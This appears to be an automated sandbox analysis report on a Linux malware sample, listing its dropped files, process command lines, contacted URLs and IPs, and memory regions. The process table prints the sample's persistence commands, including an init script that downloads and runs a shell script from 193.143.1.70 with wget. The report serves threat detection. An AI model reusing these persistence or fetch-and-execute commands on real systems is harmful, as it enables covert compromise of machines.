Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
x86_64.nn.elf
|
ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
|
initial sample
|
 |
|
|
/etc/init.d/sh
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/etc/init.d/system
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/etc/profile
|
ASCII text
|
dropped
|
|
|
|
/etc/rc.local
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/boot/bootcmd
|
ASCII text
|
dropped
|
||
|
/etc/inittab
|
ASCII text
|
dropped
|
||
|
/etc/motd
|
ASCII text
|
dropped
|
||
|
/etc/systemd/system/custom.service
|
ASCII text
|
dropped
|
||
|
/memfd:snapd-env-generator (deleted)
|
ASCII text
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
/usr/bin/dash
|
-
|
||
|
/usr/bin/rm
|
rm -f /tmp/tmp.XjqyGdPUcL /tmp/tmp.54TXZwsV42 /tmp/tmp.WE7KFANlBU
|
||
|
/usr/bin/dash
|
-
|
||
|
/usr/bin/rm
|
rm -f /tmp/tmp.XjqyGdPUcL /tmp/tmp.54TXZwsV42 /tmp/tmp.WE7KFANlBU
|
||
|
/tmp/x86_64.nn.elf
|
/tmp/x86_64.nn.elf
|
||
|
/tmp/x86_64.nn.elf
|
-
|
||
|
/tmp/x86_64.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "systemctl enable custom.service >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/systemctl
|
systemctl enable custom.service
|
||
|
/tmp/x86_64.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/chmod
|
chmod +x /etc/init.d/system
|
||
|
/tmp/x86_64.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/ln
|
ln -s /etc/init.d/system /etc/rcS.d/S99system
|
||
|
/tmp/x86_64.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh'\n /bin/sh &\n wget
http://193.143.1.70/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh'\n
killall sh\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n
exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh"
|
||
|
/tmp/x86_64.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/chmod
|
chmod +x /etc/init.d/sh
|
||
|
/tmp/x86_64.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/mkdir
|
mkdir -p /etc/rc.d
|
||
|
/tmp/x86_64.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/ln
|
ln -s /etc/init.d/sh /etc/rc.d/S99sh
|
||
|
/tmp/x86_64.nn.elf
|
-
|
||
|
/tmp/x86_64.nn.elf
|
-
|
||
|
/tmp/x86_64.nn.elf
|
-
|
||
|
/tmp/x86_64.nn.elf
|
-
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
||
|
/usr/libexec/gnome-session-binary
|
-
|
||
|
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
|
||
|
/usr/libexec/gsd-housekeeping
|
/usr/libexec/gsd-housekeeping
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
There are 45 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://193.143.1.70/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sbi
|
unknown
|
||
|
http://193.143.1.70/curl.sh
|
unknown
|
||
|
http://193.143.1.70/lol.sh
|
unknown
|
||
|
http://193.143.1.70/
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
54.175.155.187
|
unknown
|
United States
|
||
|
25.127.111.67
|
unknown
|
United Kingdom
|
||
|
99.66.159.85
|
unknown
|
United States
|
||
|
158.112.240.155
|
unknown
|
Norway
|
||
|
78.89.88.204
|
unknown
|
Kuwait
|
||
|
212.184.161.185
|
unknown
|
Germany
|
||
|
58.35.172.153
|
unknown
|
China
|
||
|
205.106.102.210
|
unknown
|
United States
|
||
|
55.223.162.111
|
unknown
|
United States
|
||
|
78.0.200.6
|
unknown
|
Croatia (LOCAL Name: Hrvatska)
|
||
|
15.78.168.136
|
unknown
|
United States
|
||
|
22.34.51.50
|
unknown
|
United States
|
||
|
26.115.224.4
|
unknown
|
United States
|
||
|
8.246.129.167
|
unknown
|
United States
|
||
|
43.28.168.229
|
unknown
|
Japan
|
||
|
130.201.71.102
|
unknown
|
United States
|
||
|
32.126.116.98
|
unknown
|
United States
|
||
|
70.74.123.149
|
unknown
|
Canada
|
||
|
115.45.125.36
|
unknown
|
China
|
||
|
16.29.86.167
|
unknown
|
United States
|
||
|
150.177.115.212
|
unknown
|
United States
|
||
|
6.201.216.156
|
unknown
|
United States
|
||
|
159.99.74.215
|
unknown
|
United States
|
||
|
71.158.98.180
|
unknown
|
United States
|
||
|
205.140.96.108
|
unknown
|
United States
|
||
|
155.125.183.116
|
unknown
|
United States
|
||
|
80.156.57.204
|
unknown
|
Germany
|
||
|
68.248.192.21
|
unknown
|
United States
|
||
|
60.231.178.48
|
unknown
|
Australia
|
||
|
172.99.232.212
|
unknown
|
Reserved
|
||
|
149.13.0.241
|
unknown
|
United States
|
||
|
16.16.81.102
|
unknown
|
United States
|
||
|
96.31.249.199
|
unknown
|
United States
|
||
|
51.215.108.58
|
unknown
|
United States
|
||
|
158.33.241.64
|
unknown
|
United States
|
||
|
155.216.208.108
|
unknown
|
United States
|
||
|
116.56.15.114
|
unknown
|
China
|
||
|
49.229.147.114
|
unknown
|
Thailand
|
||
|
179.151.96.17
|
unknown
|
Brazil
|
||
|
205.81.101.168
|
unknown
|
United States
|
||
|
220.250.85.95
|
unknown
|
China
|
||
|
38.116.131.10
|
unknown
|
United States
|
||
|
96.209.196.139
|
unknown
|
United States
|
||
|
169.206.132.207
|
unknown
|
United States
|
||
|
81.219.131.180
|
unknown
|
Poland
|
||
|
12.50.225.238
|
unknown
|
United States
|
||
|
28.87.124.65
|
unknown
|
United States
|
||
|
186.225.61.230
|
unknown
|
Brazil
|
||
|
194.49.206.25
|
unknown
|
Germany
|
||
|
129.142.229.58
|
unknown
|
Denmark
|
||
|
158.192.13.218
|
unknown
|
France
|
||
|
191.137.248.1
|
unknown
|
Brazil
|
||
|
193.143.1.70
|
unknown
|
unknown
|
||
|
82.100.106.205
|
unknown
|
Sweden
|
||
|
201.87.54.176
|
unknown
|
Brazil
|
||
|
67.209.26.26
|
unknown
|
United States
|
||
|
151.184.198.183
|
unknown
|
Netherlands
|
||
|
75.40.73.165
|
unknown
|
United States
|
||
|
221.111.28.204
|
unknown
|
Japan
|
||
|
133.107.26.222
|
unknown
|
Japan
|
||
|
216.38.180.141
|
unknown
|
United States
|
||
|
19.39.200.131
|
unknown
|
United States
|
||
|
129.133.221.199
|
unknown
|
United States
|
||
|
28.107.51.90
|
unknown
|
United States
|
||
|
52.116.192.74
|
unknown
|
United States
|
||
|
222.35.190.57
|
unknown
|
China
|
||
|
187.25.50.137
|
unknown
|
Brazil
|
||
|
215.195.201.204
|
unknown
|
United States
|
||
|
128.8.197.246
|
unknown
|
United States
|
||
|
67.181.34.179
|
unknown
|
United States
|
||
|
209.44.168.111
|
unknown
|
United States
|
||
|
157.188.219.166
|
unknown
|
United States
|
||
|
175.34.114.208
|
unknown
|
Australia
|
||
|
12.53.0.84
|
unknown
|
United States
|
||
|
78.59.1.232
|
unknown
|
Lithuania
|
||
|
148.112.119.193
|
unknown
|
United States
|
||
|
116.63.119.225
|
unknown
|
China
|
||
|
91.228.89.212
|
unknown
|
Poland
|
||
|
87.107.198.90
|
unknown
|
Iran (ISLAMIC Republic Of)
|
||
|
24.39.77.218
|
unknown
|
United States
|
||
|
81.209.209.148
|
unknown
|
European Union
|
||
|
34.58.244.19
|
unknown
|
United States
|
||
|
104.159.14.217
|
unknown
|
Canada
|
||
|
38.202.249.45
|
unknown
|
United States
|
||
|
131.64.179.230
|
unknown
|
United States
|
||
|
120.226.160.10
|
unknown
|
China
|
||
|
92.160.59.227
|
unknown
|
France
|
||
|
189.69.6.126
|
unknown
|
Brazil
|
||
|
97.63.109.17
|
unknown
|
United States
|
||
|
192.218.93.75
|
unknown
|
Japan
|
||
|
219.189.69.90
|
unknown
|
Japan
|
||
|
173.8.141.66
|
unknown
|
United States
|
||
|
59.62.194.124
|
unknown
|
China
|
||
|
60.211.117.138
|
unknown
|
China
|
||
|
71.241.42.164
|
unknown
|
United States
|
||
|
146.254.89.43
|
unknown
|
Germany
|
||
|
54.23.34.251
|
unknown
|
United States
|
||
|
56.76.75.179
|
unknown
|
United States
|
||
|
143.94.69.59
|
unknown
|
Japan
|
||
|
40.23.228.72
|
unknown
|
United States
|
There are 90 hidden IPs, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
419000
|
page execute read
|
|
||
|
419000
|
page execute read
|
|
||
|
7fff31f21000
|
page read and write
|
|||
|
1c33000
|
page read and write
|
|||
|
1c38000
|
page read and write
|
|||
|
51a000
|
page read and write
|
|||
|
51c000
|
page read and write
|
|||
|
7fff31fb6000
|
page execute read
|
|||
|
7fff31f21000
|
page read and write
|
|||
|
7fff31fb6000
|
page execute read
|
|||
|
51a000
|
page read and write
|
|||
|
1c33000
|
page read and write
|
|||
|
51c000
|
page read and write
|
There are 3 hidden memdumps, click here to show them.